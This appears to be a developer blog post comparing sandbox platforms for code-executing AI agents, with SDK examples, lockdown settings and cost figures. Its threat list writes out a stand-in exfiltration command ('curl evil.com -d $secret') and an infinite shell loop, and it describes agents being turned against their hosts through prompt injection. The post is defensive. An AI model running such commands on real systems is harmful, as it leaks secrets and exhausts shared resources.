Why do agents need sandboxes?

Code-running agents (data analysis, programming assistants, automation) run untrusted-by-design code. A sandbox prevents that code from escalating privileges, exfiltrating data, or accessing other tenants. Without it, you're one prompt injection away from a breach.

E2B vs Modal vs Daytona?

E2B is purpose-built for AI agents (fastest spin-up, code interpreter shape). Modal is more general (any container workload). Daytona focuses on dev environments. For agents specifically, E2B is the easiest path; Modal scales to bigger workloads.

Can I run sandboxes inside my own cloud?

Yes — Firecracker microVMs (the AWS Lambda primitive), Kata Containers, or gVisor. More ops than managed but full control. For most teams under 100 sandboxes/min, managed wins on TCO.

Sandboxed Code Execution for AI Agents — E2B, Modal, Daytona, and the 2026 Stack

Code-executing AI agents are now standard. ChatGPT runs Python; Claude Code executes commands; analytical agents spin up Python kernels. Where they execute matters as much as what they execute. This post is the working guide to sandboxed code execution for agents in 2026.

Why sandboxes

Agents run code based on user input, retrieved documents, or LLM-generated reasoning. All three are untrusted. Without isolation:

Filesystem leakage — /etc/passwd, AWS credentials, other users’ data.
Network exfiltration — curl evil.com -d $secret.
Resource exhaustion — while true; do :; done.
Privilege escalation — kernel exploits, container breakouts.

A sandbox is the answer. The question is which one.

The 2026 stack

Platform	Type	Spin-up	Strengths
E2B	Managed Firecracker	<500ms	Built for AI agents, code-interpreter shape, GitHub auth
Modal	Managed serverless	1–2s	General compute, GPU support, big batches
Daytona	Managed dev envs	2–5s	IDE-shaped, good for dev tools
Fly Machines	Managed Firecracker	200ms	Generic, very cheap
AWS Lambda	Managed	<100ms	Mature, restrictive (no GPU, 15min limit)
Cloudflare Workers / Sandbox	Managed isolates	10ms	V8 only, very fast, limited
Daytona / Codespaces	Containers	3–10s	Persistent dev experience
Self-host Firecracker	Self-host	200ms	Full control
gVisor	Self-host	100ms	Container-style sandbox

E2B — the AI-native choice

E2B is purpose-built for agents. Spin up a Linux VM in <500ms, run code, kill it.

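from e2b_code_interpreter import Sandbox

# Assumes E2B_API_KEY is set and data.csv already exists in the sandbox's working directory.
with Sandbox() as sb:
    result = sb.run_code("import pandas as pd; df = pd.read_csv('data.csv'); df.describe()")
    print(result.text)  # text form of the last expression's value

    # Upload a file
    sb.files.write("/tmp/script.py", "print('hi')")

    # Run a shell command and show what it printed
    out = sb.commands.run("ls -la /tmp")
    print(out.stdout)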

What’s good:

Fast spin-up. Firecracker microVM under the hood.
Persistent state within a sandbox session.
File and command APIs — most agent needs.
Pre-installed Python, Node, etc. Agent doesn’t have to install pandas every time.
Internet access (allowlist configurable).

For a code interpreter for an LLM, E2B is the path of least resistance.

Modal — when you need more

For larger workloads (longer runs, GPU, big batch jobs), Modal is the next step.

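import modal

app = modal.App("agent-runner")

@app.function(image=modal.Image.debian_slim().pip_install("pandas", "scikit-learn"))
def analyze(csv_text: str) -> str:
    # Imports live inside the function so they resolve in the remote image.
    import pandas as pd
    from io import StringIO
    df = pd.read_csv(StringIO(csv_text))
    return df.describe().to_json()

# Call from agent. .remote() needs a running app, so this uses a local entrypoint (run with `modal run`):
@app.local_entrypoint()
def main():
    csv_data = "a,b\n1,2\n3,4\n"  # placeholder input
    print(analyze.remote(csv_data))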

Modal scales bigger and supports GPUs. It’s not “spin-up-microVM-fast” — typical first call is 1–2s — but for longer jobs the difference is irrelevant.

Tool integration with an LLM

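# Assumed imports: E2B's async sandbox client and LangChain's tool decorator.
from e2b_code_interpreter import AsyncSandbox
from langchain_core.tools import tool

@tool
async def run_python(code: str) -> str:
    """Run Python code in a sandbox. Returns stdout + stderr."""
    sb = await AsyncSandbox.create()
    try:
        result = await sb.run_code(code, timeout=30)
        if result.error:
            return f"{result.error.name}: {result.error.value}"
        # result.text is the last expression's value; logs hold printed output.
        printed = "".join(result.logs.stdout + result.logs.stderr)
        return result.text or printed or "(no output)"
    except Exception as e:
        return f"sandbox error: {e}"
    finally:
        await sb.kill()  # always release the sandbox, even on failure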

Wire it to an agent:

agent = create_agent(tools=[run_python])
result = await agent.ainvoke({"messages": [HumanMessage("calculate the variance of [1,2,3,4,5]")]})

The agent calls run_python with code; the sandbox executes; results flow back. Same shape as any tool call.

What to lock down

For each sandbox session, decide:

Network: full / allowlist / none. Default to allowlist (the few APIs the agent should reach).
Filesystem: scratch only / mount specific dirs / read-only.
Time limit: 30 seconds is generous for most code; cap aggressively.
Memory limit: 1 GB for code interpreters; less for narrow tasks.
CPU limit: 1 core usually plenty.
Egress data: cap bytes; alert on outliers.

E2B and Modal both expose these. Self-host and you set them yourself.
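
One way to keep these decisions explicit is a single policy object per session. The sketch below is only an illustration: `SandboxPolicy`, `NetworkMode`, the field names, and the egress default are hypothetical and are not E2B or Modal parameters, so each field would still have to be mapped onto whatever your provider exposes.

```python
from dataclasses import dataclass, field
from enum import Enum


class NetworkMode(Enum):
    FULL = "full"
    ALLOWLIST = "allowlist"
    NONE = "none"


@dataclass(frozen=True)
class SandboxPolicy:
    """Hypothetical per-session limits; not a real E2B or Modal type."""
    network: NetworkMode = NetworkMode.ALLOWLIST
    allowed_hosts: frozenset = field(default_factory=frozenset)
    timeout_s: int = 30
    memory_mb: int = 1024
    cpu_cores: int = 1
    max_egress_bytes: int = 10 * 1024 * 1024  # assumed cap, tune per workload

    def validate(self) -> None:
        """Reject combinations that would silently widen or break access."""
        if self.network is NetworkMode.ALLOWLIST and not self.allowed_hosts:
            raise ValueError("allowlist mode needs at least one host")
        if self.network is not NetworkMode.ALLOWLIST and self.allowed_hosts:
            raise ValueError("allowed_hosts only applies in allowlist mode")
        if min(self.timeout_s, self.memory_mb, self.cpu_cores) <= 0:
            raise ValueError("limits must be positive")
```

Calling `validate()` before creating the sandbox means a misconfigured session fails loudly instead of starting with looser limits than intended.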

When self-hosted wins

Strict compliance (data must not leave VPC).
High volume (>100 sandboxes/min sustained — managed cost rises).
Specific networking needs (custom egress filtering).
Custom base images that aren’t a fit for managed.

For most teams under that threshold, managed (E2B / Modal) wins.

Common patterns

1. Per-conversation sandbox

The agent maintains one sandbox per user session. State persists across tool calls within the session. Killed at session end.
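
A minimal sketch of that lifecycle, assuming a sandbox handle only needs a `kill()` method. `SessionSandboxes` and `SandboxLike` are hypothetical names, and the factory would wrap whichever client you actually use.

```python
from typing import Callable, Dict, Protocol


class SandboxLike(Protocol):
    """Anything with a kill() method; stands in for a real sandbox handle."""
    def kill(self) -> None: ...


class SessionSandboxes:
    """Maps each session ID to exactly one sandbox (hypothetical helper)."""

    def __init__(self, factory: Callable[[], SandboxLike]) -> None:
        self._factory = factory
        self._by_session: Dict[str, SandboxLike] = {}

    def get(self, session_id: str) -> SandboxLike:
        # Create lazily on the first tool call, then reuse for later calls.
        if session_id not in self._by_session:
            self._by_session[session_id] = self._factory()
        return self._by_session[session_id]

    def end(self, session_id: str) -> None:
        # Kill on session end so no state outlives the conversation.
        sandbox = self._by_session.pop(session_id, None)
        if sandbox is not None:
            sandbox.kill()
```

Keying by session ID also keeps two users from ever sharing a sandbox. The sketch is not thread-safe; a real service would guard the dictionary with a lock.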

2. Per-call sandbox

Stateless: each run_python spins up fresh. Simple, slower, sometimes wasteful (re-imports pandas every call).

3. Pool of warm sandboxes

For low-latency apps, keep N sandboxes warm. New requests grab from the pool. Slightly more ops; sub-100ms response.
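
The pool itself can be small. The sketch below assumes a zero-argument `factory` that creates one sandbox; `WarmPool` is a hypothetical helper, not part of any provider SDK.

```python
import queue
from typing import Callable, Generic, TypeVar

T = TypeVar("T")


class WarmPool(Generic[T]):
    """Keeps up to `size` pre-created sandboxes ready (hypothetical helper)."""

    def __init__(self, factory: Callable[[], T], size: int) -> None:
        self._factory = factory
        self._ready: "queue.Queue[T]" = queue.Queue(maxsize=size)
        for _ in range(size):
            self._ready.put(factory())  # pay the spin-up cost ahead of time

    def acquire(self) -> T:
        try:
            return self._ready.get_nowait()  # warm hit
        except queue.Empty:
            return self._factory()  # pool drained: fall back to a cold start

    def refill(self) -> None:
        # Top the pool back up; call from one background task, not the request path.
        while not self._ready.full():
            self._ready.put_nowait(self._factory())
```

Used sandboxes are deliberately never returned to the pool: they are killed after use and replaced by fresh ones in `refill()`, so one user's state cannot reach the next.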

4. Sandboxed agents (recursive)

The whole agent runs in a sandbox. Useful when the agent itself is untrusted (running user-uploaded prompts).

Cost reality

E2B: ~$0.0002/second of sandbox time. A typical query (5 seconds) costs $0.001. At 100k queries/day: $100/day, $3k/month.

Self-hosted Firecracker on cheap VMs: ~$0.00001/sec. Same query = $0.00005. At scale, self-host is dramatically cheaper. Below scale, the ops cost eats the savings.
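
To see where the crossover sits, the arithmetic can be written out. The per-second rates and the 5-second query are the figures above; the fixed monthly ops cost is an assumption you would replace with your own number, and both function names are illustrative.

```python
def monthly_cost(rate_per_s: float, seconds_per_query: float,
                 queries_per_day: int, days: int = 30,
                 fixed_ops: float = 0.0) -> float:
    """Compute spend for a month plus any fixed operations cost."""
    return rate_per_s * seconds_per_query * queries_per_day * days + fixed_ops


def break_even_queries_per_day(managed_rate: float, self_rate: float,
                               seconds_per_query: float, fixed_ops: float,
                               days: int = 30) -> float:
    """Daily volume at which self-hosting's savings cover its fixed ops cost."""
    saving_per_query = (managed_rate - self_rate) * seconds_per_query
    return fixed_ops / (saving_per_query * days)


managed = monthly_cost(0.0002, 5, 100_000)       # about $3,000/month
self_hosted = monthly_cost(0.00001, 5, 100_000)  # about $150/month before ops
# Assumed: $2,000/month of engineering and on-call time for self-hosting.
crossover = break_even_queries_per_day(0.0002, 0.00001, 5, fixed_ops=2000)
print(round(managed), round(self_hosted), round(crossover))
```

Under that assumed ops figure the crossover lands at roughly 70k queries/day; a higher ops cost pushes it up proportionally.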

Common mistakes

1. No timeout

Agent’s bug → infinite loop → sandbox bills accumulate. Always cap.
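
Besides the sandbox's own timeout, a client-side deadline keeps the agent loop from hanging on a stuck call. A minimal sketch, where `run_with_deadline` is a hypothetical wrapper and `call` is any zero-argument coroutine function that talks to the sandbox:

```python
import asyncio
from typing import Awaitable, Callable


async def run_with_deadline(call: Callable[[], Awaitable[str]],
                            timeout_s: float = 30.0) -> str:
    """Await a sandbox call, giving up after timeout_s seconds."""
    try:
        return await asyncio.wait_for(call(), timeout=timeout_s)
    except asyncio.TimeoutError:
        # Report the timeout to the agent as ordinary tool output.
        return f"timed out after {timeout_s:g}s"
```

This only stops the waiting. The sandbox still has to be killed, or carry its own server-side limit, or it keeps running and billing after the caller has moved on.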

2. Network wide-open

The agent emits a curl command and exfiltrates data. Always allowlist.
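
The check has to live outside the sandbox, in an egress proxy or firewall, because code inside it is untrusted. The decision such a proxy makes can be sketched as below; the hostnames and the `is_allowed` helper are hypothetical.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist: the few APIs the agent should reach.
ALLOWED_HOSTS = frozenset({"api.example.com", "files.example.com"})


def is_allowed(url: str, allowed_hosts: frozenset = ALLOWED_HOSTS) -> bool:
    """True only for https URLs whose exact hostname is on the allowlist."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    return parts.scheme == "https" and host in allowed_hosts
```

Matching the parsed hostname exactly, rather than searching the URL string, is what blocks lookalikes such as `api.example.com.evil.com` or an allowed name smuggled into the query string.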

3. State across users

Reusing a sandbox between users → previous user’s secrets in env vars/filesystem. Always fresh per user.

4. Logging code without redaction

The user might paste an API key into a code block. Logged code = leaked key. Filter or hash before logging.
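
A minimal redaction pass, assuming two common key shapes. The patterns are illustrative rather than exhaustive, and `redact` is a hypothetical helper you would call before any log write.

```python
import hashlib
import re

# Illustrative patterns only; extend for the key formats you actually see.
SECRET_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),       # AWS access key ID shape
    re.compile(r"sk-[A-Za-z0-9_-]{20,}"),  # common "sk-" API key shape
]


def redact(code: str) -> str:
    """Replace anything that looks like a secret with a short hash tag."""
    def _mask(match: "re.Match[str]") -> str:
        digest = hashlib.sha256(match.group(0).encode()).hexdigest()[:8]
        return f"[REDACTED:{digest}]"

    for pattern in SECRET_PATTERNS:
        code = pattern.sub(_mask, code)
    return code
```

The short hash lets you tell from the logs that the same key showed up twice without storing the key itself.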

5. No resource caps

A misbehaving agent can OOM the sandbox host. Caps protect everyone.

What I’d build today

For a new agent product that runs code:

E2B for the sandbox (managed, fast, agent-shaped).
A run_python and run_shell tool wired to the agent.
Sandbox per user session, killed on disconnect.
30-second timeout, 1 GB memory cap by default.
Network allowlist for the APIs the agent should reach.
Logging + alerting on long runs and failed sandboxes.

Pair with the LLM Security in 2026 defenses — sandbox is one layer in a defense-in-depth strategy.

Read this next

If you want a working agent + E2B + tool-call template, it’s at rajpoot.dev.

Building something AI-, backend-, or data-heavy and want a second pair of eyes? I do consulting and freelance work; see my projects and ways to reach me at rajpoot.dev.
